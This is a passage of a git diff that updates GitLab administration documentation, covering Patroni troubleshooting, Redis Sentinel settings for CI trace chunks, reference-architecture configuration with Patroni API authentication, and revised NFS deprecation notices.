GitLab](../restart_gitlab.md#omnibus-gitlab-reconfigure) for the changes to take effect. +1. Check that [all the replicas are synchronized](#check-replication-status) + +### Errors in Patroni logs: the requested start point is ahead of the WAL flush position + +This error indicates that the database is not replicating: + +```plaintext +FATAL: could not receive data from WAL stream: ERROR: requested starting point 0/5000000 is ahead of the WAL flush position of this server 0/4000388 +``` + +This example error is from a replica that was initially misconfigured, and had never replicated. + +Fix it [by reinitializing the replica](#reinitialize-a-replica). + +### Patroni fails to start with `MemoryError` + +Patroni may fail to start, logging an error and stack trace: + +```plaintext +MemoryError +Traceback (most recent call last): + File "/opt/gitlab/embedded/bin/patroni", line 8, in <module> + sys.exit(main()) +[..] + File "/opt/gitlab/embedded/lib/python3.7/ctypes/__init__.py", line 273, in _reset_cache + CFUNCTYPE(c_int)(lambda: None) +``` + +If the stack trace ends with `CFUNCTYPE(c_int)(lambda: None)`, this code triggers `MemoryError` +if the Linux server has been hardened for security. + +The code causes Python to write temporary executable files, and if it cannot find a filesystem +in which to do this, for example if `noexec` is set on the `/tmp` filesystem, it fails with +`MemoryError` ([read more in the issue](https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/6184)). + +Workarounds: + +- Remove `noexec` from the mount options for filesystems like `/tmp` and `/var/tmp`. +- If set to enforcing, SELinux may also prevent these operations. Verify the issue is fixed by setting + SELinux to permissive. + +Omnibus GitLab has shipped with Patroni since 13.1 along with a build of Python 3.7. +Workarounds should stop being required when GitLab 14.x starts shipping with +[a later version of Python](https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/6164) as +the code which causes this was removed from Python 3.8. + ### Issues with other components If you're running into an issue with a component not outlined here, be sure to check the troubleshooting section of their specific documentation page: diff --git a/doc/administration/raketasks/check.md b/doc/administration/raketasks/check.md index f7c91aa6b47..bcc2f838565 100644 --- a/doc/administration/raketasks/check.md +++ b/doc/administration/raketasks/check.md @@ -278,11 +278,11 @@ To delete these references to missing local artifacts (`job.log` files): puts "#{artifact.id} #{artifact.file.path} is missing." ### Allow verification before destroy # artifact.destroy! ### Uncomment to actually destroy end - puts "Count of identified/destroyed invalid references: #{artifacts_deleted}" + puts "Count of identified/destroyed invalid references: #{artifacts_deleted}" ``` ### Delete references to missing LFS objects If `gitlab-rake gitlab:lfs:check VERBOSE=1` detects LFS objects that exist in the database -but not on disk, [follow the procedure in the LFS documentation](../../topics/git/lfs/index.md#missing-lfs-objects) +but not on disk, [follow the procedure in the LFS documentation](../lfs/index.md#missing-lfs-objects) to remove the database entries. diff --git a/doc/administration/raketasks/maintenance.md b/doc/administration/raketasks/maintenance.md index fa95f38f37c..5ddab999efe 100644 --- a/doc/administration/raketasks/maintenance.md +++ b/doc/administration/raketasks/maintenance.md @@ -67,7 +67,7 @@ GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell ## Show GitLab license information **(PREMIUM SELF)** > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/20501) in GitLab 12.6. -> - [Moved](../../subscriptions/bronze_starter.md) to GitLab Premium in 13.9. +> - Moved to GitLab Premium in 13.9. This command shows information about your [GitLab license](../../user/admin_area/license.md) and how many seats are used. It is only available on GitLab Enterprise @@ -330,7 +330,7 @@ migrations are completed (have an `up` status). ## Rebuild database indexes WARNING: -This is an experimental feature that isn't enabled by default. +This is an experimental feature that isn't enabled by default. It requires PostgreSQL 12 or later. Database indexes can be rebuilt regularly to reclaim space and maintain healthy levels of index bloat over time. @@ -348,7 +348,6 @@ sudo gitlab-rake gitlab:db:reindex['public.a_specific_index'] The following index types are not supported: -1. Unique and primary key indexes 1. Indexes used for constraint exclusion 1. Partitioned indexes 1. Expression indexes diff --git a/doc/administration/redis/replication_and_failover.md b/doc/administration/redis/replication_and_failover.md index 9fde91903e8..37d586b1d32 100644 --- a/doc/administration/redis/replication_and_failover.md +++ b/doc/administration/redis/replication_and_failover.md @@ -646,6 +646,7 @@ persistence classes. | `queues` | Store Sidekiq background jobs. | | `shared_state` | Store session-related and other persistent data. | | `actioncable` | Pub/Sub queue backend for ActionCable. | +| `trace_chunks` | Store [CI trace chunks](../job_logs.md#enable-or-disable-incremental-logging) data. | To make this work with Sentinel: @@ -657,6 +658,7 @@ To make this work with Sentinel: gitlab_rails['redis_queues_instance'] = REDIS_QUEUES_URL gitlab_rails['redis_shared_state_instance'] = REDIS_SHARED_STATE_URL gitlab_rails['redis_actioncable_instance'] = REDIS_ACTIONCABLE_URL + gitlab_rails['redis_trace_chunks_instance'] = REDIS_TRACE_CHUNKS_URL # Configure the Sentinels gitlab_rails['redis_cache_sentinels'] = [ @@ -675,6 +677,10 @@ To make this work with Sentinel: { host: ACTIONCABLE_SENTINEL_HOST, port: 26379 }, { host: ACTIONCABLE_SENTINEL_HOST2, port: 26379 } ] + gitlab_rails['redis_trace_chunks_sentinels'] = [ + { host: TRACE_CHUNKS_SENTINEL_HOST, port: 26379 }, + { host: TRACE_CHUNKS_SENTINEL_HOST2, port: 26379 } + ] ``` Note that: diff --git a/doc/administration/redis/replication_and_failover_external.md b/doc/administration/redis/replication_and_failover_external.md index 141da2f79ec..65ec8eb50e5 100644 --- a/doc/administration/redis/replication_and_failover_external.md +++ b/doc/administration/redis/replication_and_failover_external.md @@ -73,7 +73,7 @@ requirements: instead of a socket. To configure Redis to use TCP connections you need to define both `bind` and `port` in the Redis configuration file. You can bind to all interfaces (`0.0.0.0`) or specify the IP of the desired interface - (e.g., one from an internal network). + (for example, one from an internal network). - Since Redis 3.2, you must define a password to receive external connections (`requirepass`). - If you are using Redis with Sentinel, you also need to define the same diff --git a/doc/administration/reference_architectures/10k_users.md b/doc/administration/reference_architectures/10k_users.md index 4627b27a45e..1fc3483fbd4 100644 --- a/doc/administration/reference_architectures/10k_users.md +++ b/doc/administration/reference_architectures/10k_users.md @@ -94,7 +94,6 @@ cloud "**Object Storage**" as object_storage #white elb -[#6a9be7]-> gitlab elb -[#6a9be7]--> monitor -gitlab -[#32CD32]> sidekiq gitlab -[#32CD32]--> ilb gitlab -[#32CD32]-> object_storage gitlab -[#32CD32]---> redis @@ -598,8 +597,12 @@ in the second step, do not supply the `EXTERNAL_URL` value. # Replace POSTGRESQL_PASSWORD_HASH with a generated md5 value postgresql['sql_user_password'] = '<postgresql_password_hash>' + # Set up basic authentication for the Patroni API (use the same username/password in all nodes). + patroni['username'] = '<patroni_api_username>' + patroni['password'] = '<patroni_api_password>' + # Replace XXX.XXX.XXX.XXX/YY with Network Address - postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24) + postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24 127.0.0.1/32) # Set the network addresses that the exporters will listen on for monitoring node_exporter['listen_address'] = '0.0.0.0:9100' @@ -802,7 +805,7 @@ Managed Redis from cloud providers (such as AWS ElastiCache) will work. If these services support high availability, be sure it _isn't_ of the Redis Cluster type. Redis version 5.0 or higher is required, which is included with Omnibus GitLab packages starting with GitLab 13.0. Older Redis versions don't support an -optional count argument to SPOP, which is required for [Merge Trains](../../ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md). +optional count argument to SPOP, which is required for [Merge Trains](../../ci/pipelines/merge_trains.md). Note the Redis node's IP address or hostname, port, and password (if required). These will be necessary later when configuring the [GitLab application servers](#configure-gitlab-rails). @@ -1403,7 +1406,7 @@ in the second step, do not supply the `EXTERNAL_URL` value. postgresql['sql_user_password'] = "<praefect_postgresql_password_hash>" # Replace XXX.XXX.XXX.XXX/YY with Network Address - postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24) + postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24 127.0.0.1/32) # Set the network addresses that the exporters will listen on for monitoring node_exporter['listen_address'] = '0.0.0.0:9100' @@ -1605,7 +1608,7 @@ To configure the Praefect nodes, on each one: 1. Praefect requires to run some database migrations, much like the main GitLab application. For this you should select **one Praefect node only to run the migrations**, AKA the _Deploy Node_. This node must be configured first before the others as follows: - + 1. In the `/etc/gitlab/gitlab.rb` file, change the `praefect['auto_migrate']` setting value from `false` to `true` 1. To ensure database migrations are only run during reconfigure and not automatically on upgrade, run: @@ -1613,7 +1616,7 @@ To configure the Praefect nodes, on each one: ```shell sudo touch /etc/gitlab/skip-auto-reconfigure ``` - + 1. [Reconfigure GitLab](../restart_gitlab.md#omnibus-gitlab-reconfigure) for the changes to take effect and to run the Praefect database migrations. @@ -1681,7 +1684,7 @@ On each node: # balancer. gitlab_rails['internal_api_url'] = 'https://gitlab.example.com' - # Gitaly + # Gitaly gitaly['enable'] = true # Make Gitaly accept connections on all network interfaces. You must use @@ -2344,10 +2347,13 @@ to use GitLab Pages, this currently [requires NFS](troubleshooting.md#gitlab-pag See how to [configure NFS](../nfs.md). WARNING: -From GitLab 14.0, enhancements and bug fixes for NFS for Git repositories will no longer be -considered and customer technical support will be considered out of scope. -[Read more about Gitaly and NFS](../gitaly/index.md#nfs-deprecation-notice) and -[the correct mount options to use](../nfs.md#upgrade-to-gitaly-cluster-or-disable-caching-if-experiencing-data-loss). +Engineering support for NFS for Git repositories is deprecated. Technical support is planned to be +unavailable from GitLab 15.0. No further enhancements are planned for this feature. + +Read: + +- The [Gitaly and NFS deprecation notice](../gitaly/index.md#nfs-deprecation-notice). +- About the [correct mount options to use](../nfs.md#upgrade-to-gitaly-cluster-or-disable-caching-if-experiencing-data-loss). <div align="right"> <a type="button" class="btn btn-default" href="#setup-components"> @@ -2365,9 +2371,9 @@ the following other supporting services are supported: NGINX, Task Runner, Migra Prometheus and Grafana. Hybrid installations leverage the benefits of both cloud native and traditional -Kubernetes, you can reap certain cloud native workload management benefits while -the others are deployed in compute VMs with Omnibus as described above in this -page. +compute deployments. With this, _stateless_ components can benefit from cloud native +workload management benefits while _stateful_ components are deployed in compute VMs +with Omnibus to benefit from increased permanence. NOTE: This is an **advanced** setup. Running services in Kubernetes is well known @@ -2389,7 +2395,7 @@ future with further specific cloud provider details. |-------------------------------------------------------|----------|-------------------------|------------------|-----------------------------| | Webservice | 4 | 32 vCPU, 28.8 GB memory | `n1-highcpu-32` | 127.5 vCPU, 118 GB memory | | Sidekiq | 4 | 4 vCPU, 15 GB memory | `n1-standard-4` | 15.5 vCPU, 50 GB memory | -| Supporting services such as NGINX, Prometheus, etc. | 2 | 4 vCPU, 15 GB memory | `n1-standard-4` | 7.75 vCPU, 25 GB memory | +| Supporting services such as NGINX or Prometheus | 2 | 4 vCPU, 15 GB memory | `n1-standard-4` | 7.75 vCPU, 25 GB memory | <!-- Disable ordered list rule https://github.com/DavidAnson/markdownlint/blob/main/doc/Rules.md#md029---ordered-list-item-prefix --> <!-- markdownlint-disable MD029 --> @@ -2478,7 +2484,6 @@ elb -[#6a9be7]-> gitlab elb -[#6a9be7]-> monitor elb -[hidden]-> support -gitlab -[#32CD32]> sidekiq gitlab -[#32CD32]--> ilb gitlab -[#32CD32]-> object_storage gitlab -[#32CD32]---> redis @@ -2532,7 +2537,7 @@ For further information on resource usage, see the [Webservice resources](https: Sidekiq pods should generally have 1 vCPU and 2 GB of memory. [The provided starting point](#cluster-topology) allows the deployment of up to -16 Sidekiq pods. Expand available resources using the 1 vCPU to 2GB memory +14 Sidekiq pods. Expand available resources using the 1 vCPU to 2GB memory ratio for each additional pod. For further information on resource usage, see the [Sidekiq resources](https://docs.gitlab.com/charts/charts/gitlab/sidekiq/#resources). diff --git a/doc/administration/reference_architectures/25k_users.md b/doc/administration/reference_architectures/25k_users.md index 1f72c45c2b7..e45a8f6963c 100644 --- a/doc/administration/reference_architectures/25k_users.md +++ b/doc/administration/reference_architectures/25k_users.md @@ -19,7 +19,7 @@ full list of reference architectures, see |------------------------------------------|-------------|-------------------------|------------------|--------------|-----------| | External load balancing node(3) | 1 | 4 vCPU, 3.6 GB memory | `n1-highcpu-4` | `c5.xlarge` | `F4s v2` | | Consul(1) | 3 | 2 vCPU, 1.8 GB memory | `n1-highcpu-2` | `c5.large` | `F2s v2` | -| PostgreSQL(1) | 3 | 16 vCPU, 60 GB memory | `n1-standard-1` | `m5.4xlarge` | `D16s v3` | +| PostgreSQL(1) | 3 | 16 vCPU, 60 GB memory | `n1-standard-16` | `m5.4xlarge` | `D16s v3` | | PgBouncer(1) | 3 | 2 vCPU, 1.8 GB memory | `n1-highcpu-2` | `c5.large` | `F2s v2` | | Internal load balancing node(3) | 1 | 4 vCPU, 3.6GB memory | `n1-highcpu-4` | `c5.large` | `F2s v2` | | Redis - Cache(2) | 3 | 4 vCPU, 15 GB memory | `n1-standard-4` | `m5.xlarge` | `D4s v3` | @@ -94,7 +94,6 @@ cloud "**Object Storage**" as object_storage #white elb -[#6a9be7]-> gitlab elb -[#6a9be7]--> monitor -gitlab -[#32CD32]> sidekiq gitlab -[#32CD32]--> ilb gitlab -[#32CD32]-> object_storage gitlab -[#32CD32]---> redis @@ -600,8 +599,12 @@ in the second step, do not supply the `EXTERNAL_URL` value. # Replace POSTGRESQL_PASSWORD_HASH with a generated md5 value postgresql['sql_user_password'] = '<postgresql_password_hash>' + # Set up basic authentication for the Patroni API (use the same username/password in all nodes). + patroni['username'] = '<patroni_api_username>' + patroni['password'] = '<patroni_api_password>' + # Replace XXX.XXX.XXX.XXX/YY with Network Address - postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24) + postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24 127.0.0.1/32) # Set the network addresses that the exporters will listen on for monitoring node_exporter['listen_address'] = '0.0.0.0:9100' @@ -804,7 +807,7 @@ Managed Redis from cloud providers (such as AWS ElastiCache) will work. If these services support high availability, be sure it _isn't_ of the Redis Cluster type. Redis version 5.0 or higher is required, which is included with Omnibus GitLab packages starting with GitLab 13.0. Older Redis versions don't support an -optional count argument to SPOP, which is required for [Merge Trains](../../ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md). +optional count argument to SPOP, which is required for [Merge Trains](../../ci/pipelines/merge_trains.md). Note the Redis node's IP address or hostname, port, and password (if required). These will be necessary later when configuring the [GitLab application servers](#configure-gitlab-rails). @@ -863,7 +866,7 @@ a node and change its status from primary to replica (and vice versa). redis_exporter['flags'] = { 'redis.addr' => 'redis://10.6.0.51:6379', 'redis.password' => 'redis-password-goes-here', - } + } # Prevent database migrations from running on upgrade automatically gitlab_rails['auto_migrate'] = false @@ -1421,7 +1424,7 @@ in the second step, do not supply the `EXTERNAL_URL` value. postgresql['sql_user_password'] = "<praefect_postgresql_password_hash>" # Replace XXX.XXX.XXX.XXX/YY with Network Address - postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24) + postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24 127.0.0.1/32) # Set the network addresses that the exporters will listen on for monitoring node_exporter['listen_address'] = '0.0.0.0:9100' @@ -1623,7 +1626,7 @@ the file of the same name on this server. If this is the first Omnibus node you 1. Praefect requires to run some database migrations, much like the main GitLab application. For this you should select **one Praefect node only to run the migrations**, AKA the _Deploy Node_. This node must be configured first before the others as follows: - + 1. In the `/etc/gitlab/gitlab.rb` file, change the `praefect['auto_migrate']` setting value from `false` to `true` 1. To ensure database migrations are only run during reconfigure and not automatically on upgrade, run: @@ -1631,7 +1634,7 @@ the file of the same name on this server. If this is the first Omnibus node you ```shell sudo touch /etc/gitlab/skip-auto-reconfigure ``` - + 1. [Reconfigure GitLab](../restart_gitlab.md#omnibus-gitlab-reconfigure) for the changes to take effect and to run the Praefect database migrations. @@ -1699,7 +1702,7 @@ On each node: # balancer. gitlab_rails['internal_api_url'] = 'https://gitlab.example.com' - # Gitaly + # Gitaly gitaly['enable'] = true # Make Gitaly accept connections on all network interfaces. You must use @@ -2362,10 +2365,194 @@ to use GitLab Pages, this currently [requires NFS](troubleshooting.md#gitlab-pag See how to [configure NFS](../nfs.md). WARNING: -From GitLab 14.0, enhancements and bug fixes for NFS for Git repositories will no longer be -considered and customer technical support will be considered out of scope. -[Read more about Gitaly and NFS](../gitaly/index.md#nfs-deprecation-notice) and -[the correct mount options to use](../nfs.md#upgrade-to-gitaly-cluster-or-disable-caching-if-experiencing-data-loss). +Engineering support for NFS for Git repositories is deprecated. Technical support is planned to be +unavailable from GitLab 15.0. No further enhancements are planned for this feature. + +Read: + +- The [Gitaly and NFS deprecation notice](../gitaly/index.md#nfs-deprecation-notice). +- About the [correct mount options to use](../nfs.md#upgrade-to-gitaly-cluster-or-disable-caching-if-experiencing-data-loss). + +## Cloud Native Hybrid reference architecture with Helm Charts (alternative) + +As an alternative approach, you can also run select components of GitLab as Cloud Native +in Kubernetes via our official [Helm Charts](https://docs.gitlab.com/charts/). +In this setup, we support running the equivalent of GitLab Rails and Sidekiq nodes +in a Kubernetes cluster, named Webservice and Sidekiq respectively. In addition, +the following other supporting services are supported: NGINX, Task Runner, Migrations, +Prometheus and Grafana. + +Hybrid installations leverage the benefits of both cloud native and traditional +compute deployments. With this, _stateless_ components can benefit from cloud native +workload management benefits while _stateful_ components are deployed in compute VMs +with Omnibus to benefit from increased permanence. + +NOTE: +This is an **advanced** setup. Running services in Kubernetes is well known +to be complex. **This setup is only recommended** if you have strong working +knowledge and experience in Kubernetes. The rest of this +section will assume this. + +### Cluster topology + +The following tables and diagram details the hybrid environment using the same formats +as the normal environment above. + +First starting with the components that run in Kubernetes. The recommendations at this +time use Google Cloud’s Kubernetes Engine (GKE) and associated machine types, but the memory +and CPU requirements should translate to most other providers. We hope to update this in the +future with further specific cloud provider details. + +| Service | Nodes(1) | Configuration | GCP | Allocatable CPUs and Memory | +|-------------------------------------------------------|----------|-------------------------|------------------|-----------------------------| +| Webservice | 7 | 32 vCPU, 28.8 GB memory | `n1-highcpu-32` | 223 vCPU, 206.5 GB memory | +| Sidekiq | 4 | 4 vCPU, 15 GB memory | `n1-standard-4` | 15.5 vCPU, 50 GB memory | +| Supporting services such as NGINX, Prometheus, etc. | 2 | 4 vCPU, 15 GB memory | `n1-standard-4` | 7.75 vCPU, 25 GB memory | + +<!-- Disable ordered list rule https://github.com/DavidAnson/markdownlint/blob/main/doc/Rules.md#md029---ordered-list-item-prefix --> +<!-- markdownlint-disable MD029 --> +1. Nodes configuration is shown as it is forced to ensure pod vcpu / memory ratios and avoid scaling during **performance testing**. + In production deployments there is no need to assign pods to nodes. A minimum of three nodes in three different availability zones is strongly recommended to align with resilient cloud architecture practices. +<!-- markdownlint-enable MD029 --> + +Next are the backend components that run on static compute VMs via Omnibus (or External PaaS +services where applicable): + +| Service | Nodes | Configuration | GCP | +|--------------------------------------------|-------|-------------------------|------------------| +| Consul(1) | 3 | 2 vCPU, 1.8 GB memory | `n1-highcpu-2` | +| PostgreSQL(1) | 3 | 16 vCPU, 60 GB memory | `n1-standard-16` | +| PgBouncer(1) | 3 | 2 vCPU, 1.8 GB memory | `n1-highcpu-2` | +| Internal load balancing node(3) | 1 | 4 vCPU, 3.6GB memory | `n1-highcpu-4` | +| Redis - Cache(2) | 3 | 4 vCPU, 15 GB memory | `n1-standard-4` | +| Redis - Queues / Shared State(2) | 3 | 4 vCPU, 15 GB memory | `n1-standard-4` | +| Redis Sentinel - Cache(2) | 3 | 1 vCPU, 3.75 GB memory | `n1-standard-1` | +| Redis Sentinel - Queues / Shared State(2) | 3 | 1 vCPU, 3.75 GB memory | `n1-standard-1` | +| Gitaly | 3 | 32 vCPU, 120 GB memory | `n1-standard-32` | +| Praefect | 3 | 4 vCPU, 3.6 GB memory | `n1-highcpu-4` | +| Praefect PostgreSQL(1) | 1+ | 2 vCPU, 1.8 GB memory | `n1-highcpu-2` | +| Object storage(4) | n/a | n/a | n/a | + +<!-- Disable ordered list rule https://github.com/DavidAnson/markdownlint/blob/main/doc/Rules.md#md029---ordered-list-item-prefix --> +<!-- markdownlint-disable MD029 --> +1. Can be optionally run on reputable third-party external PaaS PostgreSQL solutions. Google Cloud SQL and AWS RDS are known to work, however Azure Database for PostgreSQL is [not recommended](https://gitlab.com/gitlab-org/quality/reference-architectures/-/issues/61) due to performance issues. Consul is primarily used for PostgreSQL high availability so can be ignored when using a PostgreSQL PaaS setup. However it is also used optionally by Prometheus for Omnibus auto host discovery. +2. Can be optionally run on reputable third-party external PaaS Redis solutions. Google Memorystore and AWS Elasticache are known to work. +3. Can be optionally run on reputable third-party load balancing services (LB PaaS). AWS ELB is known to work. +4. Should be run on reputable third party object storage (storage PaaS) for cloud implementations. Google Cloud Storage and AWS S3 are known to work. +<!-- markdownlint-enable MD029 --> + +NOTE: +For all PaaS solutions that involve configuring instances, it is strongly recommended to implement a minimum of three nodes in three different availability zones to align with resilient cloud architecture practices. + +```plantuml +@startuml 25k + +card "Kubernetes via Helm Charts" as kubernetes { + card "**External Load Balancer**" as elb #6a9be7 + + together { + collections "**Webservice** x7" as gitlab #32CD32 + collections "**Sidekiq** x4" as sidekiq #ff8dd1 + } + + card "**Prometheus + Grafana**" as monitor #7FFFD4 + card "**Supporting Services**" as support +} + +card "**Internal Load Balancer**" as ilb #9370DB +collections "**Consul** x3" as consul #e76a9b + +card "Gitaly Cluster" as gitaly_cluster { + collections "**Praefect** x3" as praefect #FF8C00 + collections "**Gitaly** x3" as gitaly #FF8C00 + card "**Praefect PostgreSQL***\n//Non fault-tolerant//" as praefect_postgres #FF8C00 + + praefect -[#FF8C00]-> gitaly + praefect -[#FF8C00]> praefect_postgres +} + +card "Database" as database { + collections "**PGBouncer** x3" as pgbouncer #4EA7FF + card "**PostgreSQL** (Primary)" as postgres_primary #4EA7FF + collections "**PostgreSQL** (Secondary) x2" as postgres_secondary #4EA7FF + + pgbouncer -[#4EA7FF]-> postgres_primary + postgres_primary .[#4EA7FF]> postgres_secondary +} + +card "redis" as redis { + collections "**Redis Persistent** x3" as redis_persistent #FF6347 + collections "**Redis Cache** x3" as redis_cache #FF6347 + collections "**Redis Persistent Sentinel** x3" as redis_persistent_sentinel #FF6347 + collections "**Redis Cache Sentinel** x3"as redis_cache_sentinel #FF6347 + + redis_persistent <.[#FF6347]- redis_persistent_sentinel + redis_cache <.[#FF6347]- redis_cache_sentinel +} + +cloud "**Object Storage**" as object_storage #white + +elb -[#6a9be7]-> gitlab +elb -[#6a9be7]-> monitor +elb -[hidden]-> support + +gitlab -[#32CD32]--> ilb +gitlab -[#32CD32]-> object_storage +gitlab -[#32CD32]---> redis +gitlab -[hidden]--> consul + +sidekiq -[#ff8dd1]--> ilb +sidekiq -[#ff8dd1]-> object_storage +sidekiq -[#ff8dd1]---> redis +sidekiq -[hidden]--> consul + +ilb -[#9370DB]-> gitaly_cluster +ilb -[#9370DB]-> database + +consul .[#e76a9b]-> database +consul .[#e76a9b]-> gitaly_cluster +consul .[#e76a9b,norank]--> redis + +monitor .[#7FFFD4]> consul +monitor .[#7FFFD4]-> database +monitor .[#7FFFD4]-> gitaly_cluster +monitor .[#7FFFD4,norank]--> redis +monitor .[#7FFFD4]> ilb +monitor .[#7FFFD4,norank]u--> elb + +@enduml +``` + +### Resource usage settings + +The following formulas help when calculating how many pods may be deployed within resource constraints. +The [25k reference architecture example values file](https://gitlab.com/gitlab-org/charts/gitlab/-/blob/master/examples/ref/25k.yaml) +documents how to apply the calculated configuration to the Helm Chart. + +#### Webservice + +Webservice pods typically need about 1 vCPU and 1.25 GB of memory _per worker_. +Each Webservice pod will consume roughly 4 vCPUs and 5 GB of memory using +the [recommended topology](#cluster-topology) because four worker processes +are created by default and each pod has other small processes running. + +For 25k users we recommend a total Puma worker count of around 140. +With the [provided recommendations](#cluster-topology) this allows the deployment of up to 35 +Webservice pods with 4 workers per pod and 5 pods per node. Expand available resources using +the ratio of 1 vCPU to 1.25 GB of memory _per each worker process_ for each additional +Webservice pod. + +For further information on resource usage, see the [Webservice resources](https://docs.gitlab.com/charts/charts/gitlab/webservice/#resources). + +#### Sidekiq + +Sidekiq pods should generally have 1 vCPU and 2 GB of memory. + +[The provided starting point](#cluster-topology) allows the deployment of up to +14 Sidekiq pods. Expand available resources using the 1 vCPU to 2GB memory +ratio for each additional pod. + +For further information on resource usage, see the [Sidekiq resources](https://docs.gitlab.com/charts/charts/gitlab/sidekiq/#resources). <div align="right"> <a type="button" class="btn btn-default" href="#setup-components"> diff --git a/doc/administration/reference_architectures/2k_users.md b/doc/administration/reference_architectures/2k_users.md index 7db3a343e0b..ff3db877553 100644 --- a/doc/administration/reference_architectures/2k_users.md +++ b/doc/administration/reference_architectures/2k_users.md @@ -324,7 +324,7 @@ to be used with GitLab. Redis version 5.0 or higher is required, as this is what ships with Omnibus GitLab packages starting with GitLab 13.0. Older Redis versions do not support an optional count argument to SPOP which is now required for -[Merge Trains](../../ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md). +[Merge Trains](../../ci/pipelines/merge_trains.md). In addition, GitLab makes use of certain commands like `UNLINK` and `USAGE` which were introduced only in Redis 4. @@ -965,10 +965,13 @@ possible. However, if you intend to use GitLab Pages, See how to [configure NFS](../nfs.md). WARNING: -From GitLab 14.0, enhancements and bug fixes for NFS for Git repositories will no longer be -considered and customer technical support will be considered out of scope. -[Read more about Gitaly and NFS](../gitaly/index.md#nfs-deprecation-notice) and -[the correct mount options to use](../nfs.md#upgrade-to-gitaly-cluster-or-disable-caching-if-experiencing-data-loss). +Engineering support for NFS for Git repositories is deprecated. Technical support is planned to be +unavailable from GitLab 15.0. No further enhancements are planned for this feature. + +Read: + +- The [Gitaly and NFS deprecation notice](../gitaly/index.md#nfs-deprecation-notice). +- About the [correct mount options to use](../nfs.md#upgrade-to-gitaly-cluster-or-disable-caching-if-experiencing-data-loss). <div align="right"> <a type="button" class="btn btn-default" href="#setup-components"> diff --git a/doc/administration/reference_architectures/3k_users.md b/doc/administration/reference_architectures/3k_users.md index bca5e4c3dab..ef58e69ee27 100644 --- a/doc/administration/reference_architectures/3k_users.md +++ b/doc/administration/reference_architectures/3k_users.md @@ -101,7 +101,6 @@ cloud "**Object Storage**" as object_storage #white elb -[#6a9be7]-> gitlab elb -[#6a9be7]--> monitor -gitlab -[#32CD32]> sidekiq gitlab -[#32CD32]--> ilb gitlab -[#32CD32]-> object_storage gitlab -[#32CD32]---> redis @@ -440,7 +439,7 @@ services support high availability, be sure it is **not** the Redis Cluster type Redis version 5.0 or higher is required, as this is what ships with Omnibus GitLab packages starting with GitLab 13.0. Older Redis versions do not support an optional count argument to SPOP which is now required for -[Merge Trains](../../ci/merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md). +[Merge Trains](../../ci/pipelines/merge_trains.md). Note the Redis node's IP address or hostname, port, and password (if required). These will be necessary when configuring the @@ -829,7 +828,7 @@ in the second step, do not supply the `EXTERNAL_URL` value. username of `gitlab_replicator` (recommended). The command will request a password and a confirmation. Use the value that is output by this command in the next step as the value of `<postgresql_replication_password_hash>`: - + ```shell sudo gitlab-ctl pg-password-md5 gitlab_replicator ``` @@ -848,7 +847,7 @@ in the second step, do not supply the `EXTERNAL_URL` value. ```ruby # Disable all components except Patroni and Consul roles(['patroni_role']) - + # PostgreSQL configuration postgresql['listen_address'] = '0.0.0.0' @@ -866,7 +865,7 @@ in the second step, do not supply the `EXTERNAL_URL` value. # Prevent database migrations from running on upgrade automatically gitlab_rails['auto_migrate'] = false - + # Configure the Consul agent consul['services'] = %w(postgresql) ## Enable service discovery for Prometheus @@ -882,8 +881,12 @@ in the second step, do not supply the `EXTERNAL_URL` value. # Replace POSTGRESQL_PASSWORD_HASH with a generated md5 value postgresql['sql_user_password'] = '<postgresql_password_hash>' + # Set up basic authentication for the Patroni API (use the same username/password in all nodes). + patroni['username'] = '<patroni_api_username>' + patroni['password'] = '<patroni_api_password>' + # Replace XXX.XXX.XXX.XXX/YY with Network Address - postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24) + postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24 127.0.0.1/32) # Set the network addresses that the exporters will listen on for monitoring node_exporter['listen_address'] = '0.0.0.0:9100' @@ -1127,7 +1130,7 @@ in the second step, do not supply the `EXTERNAL_URL` value. postgresql['sql_user_password'] = "<praefect_postgresql_password_hash>" # Replace XXX.XXX.XXX.XXX/YY with Network Address - postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24) + postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/24 127.0.0.1/32) # Set the network addresses that the exporters will listen on for monitoring node_exporter['listen_address'] = '0.0.0.0:9100' @@ -1328,7 +1331,7 @@ the file of the same name on this server. If this is the first Omnibus node you 1. Praefect requires to run some database migrations, much like the main GitLab application. For this you should select **one Praefect node only to run the migrations**, AKA the _Deploy Node_. This node must be configured first before the others as follows: - + 1. In the `/etc/gitlab/gitlab.rb` file, change the `praefect['auto_migrate']` setting value from `false` to `true` 1. To ensure database migrations are only run during reconfigure and not automatically on upgrade, run: @@ -1336,7 +1339,7 @@ the file of the same name on this server. If this is the first Omnibus node you ```shell sudo touch /etc/gitlab/skip-auto-reconfigure ``` - + 1. [Reconfigure GitLab](../restart_gitlab.md#omnibus-gitlab-reconfigure) for the changes to take effect and to run the Praefect database migrations. @@ -2062,10 +2065,13 @@ to use GitLab Pages, this currently [requires NFS](troubleshooting.md#gitlab-pag See how to [configure NFS](../nfs.md). WARNING: -From GitLab 14.0, enhancements and bug fixes for NFS for Git repositories will no longer be -considered and customer technical support will be considered out of scope. -[Read more about Gitaly and NFS](../gitaly/index.md#nfs-deprecation-notice) and -[the correct mount options to use](../nfs.md#upgrade-to-gitaly-cluster-or-disable-caching-if-experiencing-data-loss). +Engineering support for NFS for Git repositories is deprecated. Technical support is planned to be +unavailable from GitLab 15.0. No further enhancements are planned for this feature. + +Read: + +- The [Gitaly and NFS deprecation notice](../gitaly/index.md#nfs-deprecation-notice). +- About the [correct mount options to use](../nfs.md#upgrade-to-gitaly-cluster-or-disable-caching-if-experiencing-data-loss). ## 